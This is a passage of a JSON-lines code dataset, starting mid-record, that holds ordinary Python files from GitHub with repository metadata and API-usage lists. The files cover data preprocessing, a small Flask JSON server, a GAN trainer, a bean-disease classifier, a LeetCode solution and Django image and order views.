"call"}, {"api_name": "tensorflow.train", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "33759605774", "text": "import math\nimport pandas as pd\nimport os\nimport glob\nimport time\nimport config as cfg\nimport warnings\n\n\ndef get_Event_code(path):\n #Get the event code translated for further analyses\n #65 = SelfStim ; 66 = CtrlStim ; 67 = SelfRest ; 68 = CtrlRest ; 69 = SelfSoc ; 70 = CtrlSoc\n\n if '_A_' in path:\n code = 65\n if '_B_' in path:\n code = 66\n if '_C_' in path:\n code = 67\n if '_D_' in path:\n code = 68\n if '_E_' in path:\n code = 69\n if '_F_' in path:\n code = 70\n return code\n\ndef adapt_csv_format(label, normalize_scales=True, write=True):\n\n ## Allow to have a new csv table adapted for deep learning analysis with rawest datas (i.e. positions x/y/z).\n ## The format is the same as diff_module files that are commonly used in the project.\n ## Posibility to choose if we want to classify by situations or subjective scales with argument \"label\"\n\n start_time = time.time()\n directory = cfg.DL_CSV_output_path\n os.chdir(directory)\n\n files = []\n subjects = []\n data = {}\n\n #Get individual files to concatenate it in a single table\n for csv in glob.glob('*x_y.csv'):\n files.append(csv)\n for file in files:\n subjects.append(file.split('_')[0])\n data[file.split('_')[0]] = pd.read_csv(directory + file, sep=',')\n\n #Add column \"Subject\" with sub names to corresponding values, normalize scales between [0, 1]\n for sub in subjects:\n data[sub]['Subject'] = sub\n for col in data[sub][['Emotion', 'Presence']]:\n if normalize_scales == True:\n data[sub][col] = (data[sub][col] - data[sub][col].min()) / (data[sub][col].max() - data[sub][col].min())\n print(\"Data transformation\")\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n Global_csv = pd.concat(data, ignore_index=True)\n\n\n #Replace \"labels\" columns at the beginning of the table\n moving_columns = Global_csv.pop('EventCode')\n Global_csv.insert(0, 'EventCode', moving_columns)\n moving_columns = Global_csv.pop('Subject')\n Global_csv.insert(0, 'Subject', moving_columns)\n moving_columns = Global_csv.pop('Presence')\n Global_csv.insert(2, 'Presence', moving_columns)\n moving_columns = Global_csv.pop('Emotion')\n Global_csv.insert(2, 'Emotion', moving_columns)\n\n #Rename 'EventCode' by 'Condition'\n Global_csv = Global_csv.rename({'EventCode': 'Condition'}, axis=1)\n\n #Choose columns for labelisation, 'Both' = Condition + Subjective scales, 'Condition' = Condition only, 'EmotionOnly' = Only emotional values, this was used in the paper 'Subjectivity' = Subjectives scales only\n if label == 'Both':\n print('Label choice : Both')\n elif label == 'Condition':\n Global_csv = Global_csv.drop(columns=['Presence', 'Emotion'])\n print('Label choice : Condition')\n elif label == 'EmotionOnly':\n Global_csv = Global_csv.drop(columns=['Presence'])\n elif label == 'Subjectivity':\n Global_csv = Global_csv.drop(columns=['Condition'])\n 
print('Label choice : Subjectivity')\n\n #Write the table in a given folder\n if write == True:\n Global_csv.to_csv(cfg.DL_CSV_output_path + '/' + 'All_Subs_Positions.csv',\n index=False, header=True)\n return Global_csv\n\n\ndef module_calcul(df, write=True):\n\n ###Function that calculate euclidian distances of every features at every frame (concatenation of pose x/y to\n ###obtain only 1 column pose)\n\n print(\"Data table : \", df)\n\n warnings.simplefilter(action='ignore', category=FutureWarning)\n\n #Create a list then a df with new columns names to insert modules\n Modules = []\n\n for col in df.columns:\n if 'x' in col:\n Modules.insert(len(df.columns), col.replace('x', ''))\n elif 'AU' in col:\n Modules.insert(len(df.columns), col)\n\n Modules_csv = pd.DataFrame(columns=Modules)\n\n\n #Module (Euclidian distances) calculation\n print(\"Euclidian distances calculation, it may take a while (several hours). Time for a coffee break well deserved.\")\n for i in range(len(df)):\n temp = []\n for col in Modules_csv.columns:\n if col[0] == '_':\n temp.append(math.sqrt((df['x' + col][i]**2) + (df['y' + col][i]**2)))\n elif 'AU' in col:\n temp.append(df[col][i])\n else:\n temp.append(math.sqrt((df[col + 'x'][i] ** 2) + (df[col + 'y'][i] ** 2)))\n new_line = pd.Series(temp, index=Modules_csv.columns)\n Modules_csv = Modules_csv.append(new_line, ignore_index=True)\n\n #Add and replace \"labels\" columns\n #columns_label = df.iloc[:,:4]\n columns_label = df.iloc[:,:3]\n\n Modules_csv = pd.concat([Modules_csv,columns_label], axis=1)\n\n moving_columns = Modules_csv.pop('Condition')\n Modules_csv.insert(0, 'Condition', moving_columns)\n moving_columns = Modules_csv.pop('Subject')\n Modules_csv.insert(0, 'Subject', moving_columns)\n #moving_columns = Modules_csv.pop('Presence')\n #Modules_csv.insert(2, 'Presence', moving_columns)\n moving_columns = Modules_csv.pop('Emotion')\n Modules_csv.insert(2, 'Emotion', moving_columns)\n\n print(Modules_csv)\n\n #Write the table in a given folder\n if write == True:\n Modules_csv.to_csv(cfg.DL_CSV_output_path + '/' + 'All_Subs_Modules.csv',\n index=False, header=True)\n\n return Modules_csv\n\ndef diff_module_calcul(module_df, write=True):\n\n ###Function that calculate differences of modules obtained, i.e. 
module x - module x-1 where x is a frame (= a line\n ###in the table)\n\n warnings.simplefilter(action='ignore', category=FutureWarning)\n\n #Create a empty df with same columns name to insert diff modules\n Diff_Modules = pd.DataFrame(columns=module_df.columns)\n #Diff_Modules = Diff_Modules.drop(['Subject', 'Emotion', 'Presence'], axis=1)\n Diff_Modules = Diff_Modules.drop(['Subject', 'Emotion'], axis=1)\n\n #Diff modules calculation\n print(\"Euclidian distances differences calculation, it may take a while (several hours)\")\n for i in range (1,len(module_df)):\n temp = [module_df['Condition'][i]]\n for col in module_df.columns[3::]:\n if 'AU' in col:\n temp.append(module_df[col][i])\n else:\n temp.append(abs(module_df[col][i] - module_df[col][i-1]))\n new_line = pd.Series(temp, index=Diff_Modules.columns)\n Diff_Modules = Diff_Modules.append(new_line, ignore_index=True)\n\n #Add and replace \"labels\" columns\n #columns_label = module_df[['Subject', 'Emotion', 'Presence']].iloc[1:,:]\n columns_label = module_df[['Subject', 'Emotion']].iloc[1:, :]\n Diff_Modules = pd.concat([Diff_Modules, columns_label],axis=1)\n\n moving_columns = Diff_Modules.pop('Subject')\n Diff_Modules.insert(0, 'Subject', moving_columns)\n #moving_columns = Diff_Modules.pop('Presence')\n #Diff_Modules.insert(2, 'Presence', moving_columns)\n moving_columns = Diff_Modules.pop('Emotion')\n Diff_Modules.insert(2, 'Emotion', moving_columns)\n\n #Diff_Modules[['Subject', 'Emotion', 'Presence']] = Diff_Modules[['Subject', 'Emotion', 'Presence']].shift(-1)\n Diff_Modules[['Subject', 'Emotion']] = Diff_Modules[['Subject', 'Emotion']].shift(-1)\n Diff_Modules = Diff_Modules[:-1]\n\n print(Diff_Modules)\n\n #Write the table in a given folder\n if write == True:\n Diff_Modules.to_csv(cfg.DL_CSV_output_path + '/' + 'All_Subs_Diff_Modules.csv',\n index=False, header=True)\n\n return Diff_Modules", "repo_name": "crnl-lab/Tracking_behavior_IA_2023_BMichelot", "sub_path": "functions_get_csv_4_analysis.py", "file_name": "functions_get_csv_4_analysis.py", "file_ext": "py", "file_size_in_byte": 7596, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 36, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 57, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "warnings.simplefilter", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 110, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 119, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 131, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "warnings.simplefilter", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 172, 
"usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 178, "usage_type": "call"}, {"api_name": "config.DL_CSV_output_path", "line_number": 195, "usage_type": "attribute"}]} +{"seq_id": "4141315229", "text": "from flask import render_template, request, jsonify\n\nfrom app import *\nfrom db import *\n\n@app.route(\"/\", defaults={\"code\": None})\n@app.route(\"/\")\ndef r_index(code):\n if code is None:\n data = None\n else:\n data = load_json(code)\n\n return render_template(\"index.html\", data=data)\n\n@app.route(\"/save\", methods=[\"POST\"])\ndef r_save():\n\n data = request.json[\"data\"]\n\n code = save_json(data)\n\n return jsonify({\"code\": code})\n\nif __name__ == \"__main__\":\n app.run(\"localhost\", 1337, debug=True)\n", "repo_name": "void4/jsonserver", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 527, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "app.route", "line_number": 6, "usage_type": "call"}, {"api_name": "app.route", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 23, "usage_type": "call"}, {"api_name": "app.route", "line_number": 16, "usage_type": "call"}, {"api_name": "app.run", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "6751852442", "text": "import pyarrow.parquet as pq\nfrom pandas import DataFrame\nimport numpy as np\nfrom scipy.stats import norm\nfrom matplotlib import pyplot as plt\ndf = pq.read_table(\"ztf_000245_zg_c01_q1_dr11.parquet\").to_pandas()\nlc_table = df.loc[2] \n\nprint(lc_table) #len(mag) = 37\nmag1 = lc_table[\"mag\"]\nmag = []\nfor i in mag1:\n mag.append(i)\n\nx = mag\nx.sort()\nx_mean = np.mean(x)\nx_std = np.std(x)\npdf = norm.pdf(x, x_mean, x_std)\nplt.plot(x, pdf)\nplt.show()", "repo_name": "spacedinosaur31/Microlensing", "sub_path": "skewness_plot.py", "file_name": "skewness_plot.py", "file_ext": "py", "file_size_in_byte": 446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pyarrow.parquet.read_table", "line_number": 6, "usage_type": "call"}, {"api_name": "pyarrow.parquet", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.stats.norm.pdf", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "11333654129", "text": "from transformers import pipeline\nimport os\n\n# Function to classify bean disease\n# This function uses a pre-trained model from Hugging Face Transformers to classify images of bean leaves\n# The model has been trained to detect diseases in bean crops\n# The function takes as input the path to an image of a bean leaf and returns the predicted disease\n\ndef classify_bean_disease(image_path):\n # 
Check if the image file exists\n    if not os.path.isfile(image_path):\n        raise ValueError(f\"Image file not found: {image_path}\")\n    \n    # Create an image classification model\n    classifier = pipeline('image-classification', model='fxmarty/resnet-tiny-beans')\n    \n    # Classify the image\n    result = classifier(image_path)\n    \n    # Return the result\n    return result", "repo_name": "vixuowis/Research-2309", "sub_path": "Exp-2/output/hf-eval-data-v1/f00651_classify_bean_disease.py", "file_name": "f00651_classify_bean_disease.py", "file_ext": "py", "file_size_in_byte": 774, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.isfile", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "transformers.pipeline", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "39993885308", "text": "# question\n# https://leetcode.com/problems/find-pivot-index/?envType=study-plan&id=level-1\nfrom typing import List\n\n# question\n# https://leetcode.com/problems/find-pivot-index/?envType=study-plan&id=level-1\n\n\n# result: Time Limit Exceeded\nclass Solution:\n    def pivotIndex(self, nums: List[int]) -> int:\n        max_len = len(nums)\n        for i in range(0, max_len):\n            if sum(nums[:i]) == sum(nums[i + 1 :]):\n                return i\n        return -1\n\n\nif __name__ == \"__main__\":\n    test = Solution()\n    nums = [1, 7, 3, 6, 5, 6]\n    print(test.pivotIndex(nums))\n", "repo_name": "usma11dia0/training_of_leet_code", "sub_path": "20221031_find_pivot_index/submit_find_pivot_index_20221031.py", "file_name": "submit_find_pivot_index_20221031.py", "file_ext": "py", "file_size_in_byte": 578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "3551755913", "text": "# -*- coding: utf-8 -*-\nfrom ckiptagger import NER, POS, WS, data_utils, construct_dictionary\nimport pandas as pd\nimport gensim\nimport pickle\nimport csv\n\n\ndef initialize():\n    global ws\n    ws = WS(\"./data\", disable_cuda=False)\n    global pos\n    pos = POS(\"./data\", disable_cuda=False)\n    global ner\n    ner = NER(\"./data\", disable_cuda=False)\n    ckip_word_dict = {}\n    with open('./train_data/ckip_word_dict.pkl', 'rb') as f:\n        ckip_word_dict = pickle.load(f)\n    global dictionary\n    dictionary = construct_dictionary(ckip_word_dict)\n    # model checkpoint\n    WORDMODEL_PATH = './model/wordmodel.model'\n    global wordmodel\n    wordmodel = gensim.models.Word2Vec.load(WORDMODEL_PATH)\n\n    global check_point\n    check_point = './model/product_weight_model.pkl'\n\n    global train_data_filenames\n    train_data_filenames = ['product_tokens1.txt']\n\n    global same_word_dict\n    same_word_dict = {}\n    try:\n        with open('./train_data/same_word_dict.pkl', 'rb') as f:\n            same_word_dict = pickle.load(f)\n    except Exception as e:\n        print(e)\n\n    with open('./train_data/同義詞.csv', newline='') as csvFile:\n        rows = csv.reader(csvFile)\n        count = 0\n        for row in rows:\n            if count == 0:\n                count += 1\n                continue\n            c = 0\n            keyword = ''\n            for word in row:\n                if c == 0 or c == 1:\n                    c += 1\n                    continue\n                word = word.lower()\n                if c == 2 and word != '':\n                    c += 1\n                    keyword = word\n                if word not in same_word_dict and word != '':\n                    same_word_dict[word] = keyword.lower()\n    with open('./train_data/same_word_dict.pkl', 'wb') as f:\n        pickle.dump(same_word_dict, f, pickle.HIGHEST_PROTOCOL)\n", "repo_name": "hongyuntw/optimize_product_search", "sub_path": 
"globals.py", "file_name": "globals.py", "file_ext": "py", "file_size_in_byte": 1934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "ckiptagger.WS", "line_number": 11, "usage_type": "call"}, {"api_name": "ckiptagger.POS", "line_number": 13, "usage_type": "call"}, {"api_name": "ckiptagger.NER", "line_number": 15, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 18, "usage_type": "call"}, {"api_name": "ckiptagger.construct_dictionary", "line_number": 20, "usage_type": "call"}, {"api_name": "gensim.models.Word2Vec.load", "line_number": 24, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 36, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 41, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 60, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 60, "usage_type": "attribute"}]} +{"seq_id": "6952989128", "text": "import tensorflow as tf\nimport numpy as np\nimport os\nfrom scipy import ndimage\nfrom config import init_op, SummaryWriter\n\n\nclass Solver(object):\n \"\"\"Load dataset and train DCGAN\"\"\"\n \n def __init__(self, model, num_epoch=10, image_path='data/celeb_resized', model_save_path='model/', log_path='log/'):\n self.model = model\n self.num_epoch = num_epoch\n self.image_path = image_path\n self.model_save_path = model_save_path\n self.log_path = log_path\n \n # create directory if not exists\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n if not os.path.exists(model_save_path):\n os.makedirs(model_save_path)\n \n # construct the dcgan model\n model.build_model()\n \n \n def load_dataset(self, image_path):\n print ('loading image dataset..')\n image_files = os.listdir(image_path)\n images = np.array(list(map(lambda x: ndimage.imread(os.path.join(image_path, x), mode='RGB'), image_files))).astype(np.float32)\n images = images / 127.5 - 1\n print ('finished loading image dataset..!')\n return images\n \n \n def train(self):\n model=self.model\n \n #load image dataset\n data = self.load_dataset(self.image_path)\n num_iter_per_epoch = int(data.shape[0] / model.batch_size)\n \n config = tf.ConfigProto(allow_soft_placement = True)\n config.gpu_options.allow_growth = True\n with tf.Session(config=config) as sess:\n # initialize parameters \n try:\n tf.global_variables_initializer().run()\n except:\n tf.initialize_all_variables().run()\n \n # tensorboard\n summary_writer = SummaryWriter(logdir=self.log_path, graph=tf.get_default_graph())\n \n for e in range(self.num_epoch):\n for i in range(num_iter_per_epoch):\n # train the discriminator\n image_batch = data[i*model.batch_size:(i+1)*model.batch_size]\n z_batch = np.random.uniform(-1, 1, size=[model.batch_size , model.dim_z])\n feed_dict = {model.images: image_batch, model.z: z_batch}\n sess.run(model.d_optimizer, feed_dict)\n \n # train the generator\n feed_dict = {model.z: z_batch}\n sess.run(model.g_optimizer, feed_dict)\n \n # train the generator twice to stabilize traininig (different from paper)\n sess.run(model.g_optimizer, feed_dict)\n \n if i % 10 == 0:\n feed_dict = {model.images: image_batch, model.z: z_batch}\n summary, d_loss, g_loss = sess.run([model.summary_op, model.d_loss, model.g_loss], feed_dict)\n summary_writer.add_summary(summary, e*num_iter_per_epoch + i)\n print ('Epoch: [%d] Step: [%d/%d] d_loss: [%.6f] g_loss: [%.6f]' %(e+1, i+1, 
num_iter_per_epoch, d_loss, g_loss))\n \n if i % 500 == 0: \n model.saver.save(sess, os.path.join(self.model_save_path, 'dcgan-%d' %(e+1)), global_step=i+1) \n print ('model/dcgan-%d-%d saved' %(e+1, i+1))", "repo_name": "yunjey/davian-tensorflow", "sub_path": "notebooks/week4/solver.py", "file_name": "solver.py", "file_ext": "py", "file_size_in_byte": 3408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.ndimage.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.ConfigProto", "line_number": 44, "usage_type": "call"}, {"api_name": "config.gpu_options", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.initialize_all_variables", "line_number": 51, "usage_type": "call"}, {"api_name": "config.SummaryWriter", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "37923480990", "text": "import time\nfrom django.db import models\nimport hashlib\n\n# Create your models here.\n\n\nclass ImageTag(models.Model):\n count = models.IntegerField(default=0)\n tag_name = models.CharField(max_length=7)\n\n def __str__(self):\n return self.tag_name\n\n\ndef hashed_bed_image_path(instance, filename):\n name, suffix = filename.split('.')\n sha1 = hashlib.sha1()\n sha1.update(name.encode('utf-8'))\n hashed = sha1.hexdigest()\n year_month_day_ = time.strftime(\"%Y/%m/%d/\", time.localtime())\n return 'bed/'+year_month_day_+hashed+'.'+suffix\n\n\nclass ImageBed(models.Model):\n image_path = models.ImageField(upload_to=hashed_bed_image_path)\n origin_name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.origin_name\n\n\ndef hashed_mine_image_path(instance, filename):\n name, suffix = filename.split('.')\n sha1 = hashlib.sha1()\n sha1.update(name.encode('utf-8'))\n hashed = sha1.hexdigest()\n year_month_day_ = time.strftime(\"%Y/%m/%d/\", time.localtime())\n return 'mine/'+year_month_day_+hashed+'.'+suffix\n\n\nclass MyImage(models.Model):\n image_path = models.ImageField(upload_to=hashed_mine_image_path)\n origin_name = models.CharField(max_length=20)\n tags = 
models.ManyToManyField(ImageTag)\n # 1: mid school\n # 2: high school\n # 4: college\n # 8: undefined\n # 16: undefined\n # 32: undefined\n authority = models.CharField(max_length=4, default='075')\n\n class Meta:\n ordering = ['image_path']\n\n def __str__(self):\n return self.origin_name\n", "repo_name": "xiong35/MyBlog", "sub_path": "blog/upload/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 10, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "hashlib.sha1", "line_number": 18, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 21, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "hashlib.sha1", "line_number": 35, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 38, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "36553326977", "text": "from django.shortcuts import render, redirect, reverse\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom .models import OrderList\nfrom products.models import Services\nfrom profiles.models import UserProfile\nfrom gallery.models import Reviews\n\n# Orders page views.\n\n@login_required\ndef view_order(request):\n \"\"\" A view that renders the orders contents \"\"\"\n \n # This collects all the objects in the Reviews table by order number and puts into a flat list.\n review_true = Reviews.objects.all().values_list('order_number', flat=True)\n \n # This then collects the objects from 
the OrderList table and excludes any results from the Reviews table.\n    ol = OrderList.objects.exclude(pk__in=review_true)\n    \n    # This is used for a user who isn't an employee so they can only see their own orders, expanding on the above exclude filter.\n    olf = ol.filter(username=request.user)\n    \n    # Gets the current logged in user.\n    user = UserProfile.objects.get(user=request.user)\n    page = request.GET.get('page', 1)\n\n    # Checks to see if the logged in user is an employee.\n    if user.employee == True:\n    \n        paginator = Paginator(ol, 10)\n        employee = True\n        try:\n            olpage = paginator.page(page)\n        except PageNotAnInteger:\n            olpage = paginator.page(1)\n        except EmptyPage:\n            olpage = paginator.page(paginator.num_pages)\n        \n        return render(request, \"orders.html\", {'orders' : olpage, 'employee' : employee})\n    \n    # If they aren't then they're only allowed to see their own orders.\n    else:\n        paginator = Paginator(olf, 5)\n        employee = False\n        try:\n            olpage = paginator.page(page)\n        except PageNotAnInteger:\n            olpage = paginator.page(1)\n        except EmptyPage:\n            olpage = paginator.page(paginator.num_pages)\n        \n        return render(request, \"orders.html\", {'orders' : olpage, 'employee' : employee})\n\n\n\n@login_required\ndef delete_order(request, order, user_id):\n    \"\"\" Deletes a selected order \"\"\"\n    current_user = request.user.username\n    user = UserProfile.objects.get(user=request.user)\n    order = OrderList.objects.filter(pk=order)\n    \n    # This checks if the logged in user is the owner of the order trying to be deleted\n    # or if the user is an employee who then has the right to remove the order.\n    \n    if user_id == current_user or user.employee == True:\n        try:\n            order = OrderList.objects.filter(pk__in=order)\n            order.delete()\n            messages.success(request, \"Order has been removed.\")\n            return redirect(view_order) \n        except Exception as e:\n            messages.error(request, \"Couldn't delete object. Reason: \" + str(e))\n            return redirect(view_order)\n    \n    # If they're not the owner then it returns to the orders page with a message redirecting \n    # them back to the orders page. 
\n else:\n messages.error(request, \"Couldn't delete the order, you aren't the owner.\")\n return redirect(view_order)\n \n", "repo_name": "99ron/django_milestone", "sub_path": "orders/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "gallery.models.Reviews.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "gallery.models.Reviews.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "gallery.models.Reviews", "line_number": 18, "usage_type": "name"}, {"api_name": "models.OrderList.objects.exclude", "line_number": 21, "usage_type": "call"}, {"api_name": "models.OrderList.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.OrderList", "line_number": 21, "usage_type": "name"}, {"api_name": "profiles.models.UserProfile.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "profiles.models.UserProfile.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "profiles.models.UserProfile", "line_number": 27, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 33, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 37, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 46, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 50, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 13, "usage_type": "name"}, {"api_name": "profiles.models.UserProfile.objects.get", "line_number": 63, "usage_type": "call"}, {"api_name": "profiles.models.UserProfile.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "profiles.models.UserProfile", "line_number": 63, "usage_type": "name"}, {"api_name": "models.OrderList.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "models.OrderList.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.OrderList", "line_number": 64, "usage_type": "name"}, {"api_name": "models.OrderList.objects.filter", "line_number": 71, "usage_type": "call"}, {"api_name": "models.OrderList.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "models.OrderList", "line_number": 71, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 73, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 74, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 76, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 76, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 77, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 